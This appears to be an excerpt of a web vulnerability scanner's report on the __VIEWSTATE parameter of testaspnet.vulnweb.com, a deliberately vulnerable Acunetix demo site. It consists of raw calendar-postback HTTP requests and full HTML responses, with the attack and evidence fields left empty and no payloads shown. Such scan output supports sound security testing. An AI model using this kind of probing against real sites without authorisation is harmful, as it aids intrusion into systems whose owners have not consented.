Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8529&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAGlUgUNsIZGRkWnj3JiISvECpSmDw0fntyNtSU8A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKGnIPsCALQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxrwuu%2B3gmskB86sAmiTdIux%2BtLl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:34 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAGlUgUNsIZGRkWnj3JiISvECpSmDw0fntyNtSU8A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKGnIPsCALQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxrwuu+3gmskB86sAmiTdIux+tLl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:White" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8533&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAwf5EU9sIZGRkL9fHLsmPHmtS1CUNfNAtOu1jRDM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLzz5wXAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDDFLKRf2THN%2F80lukyZrxq5clpfo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:16 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAwf5EU9sIZGRkL9fHLsmPHmtS1CUNfNAtOu1jRDM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLzz5wXAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDDFLKRf2THN/80lukyZrxq5clpfo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:White" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
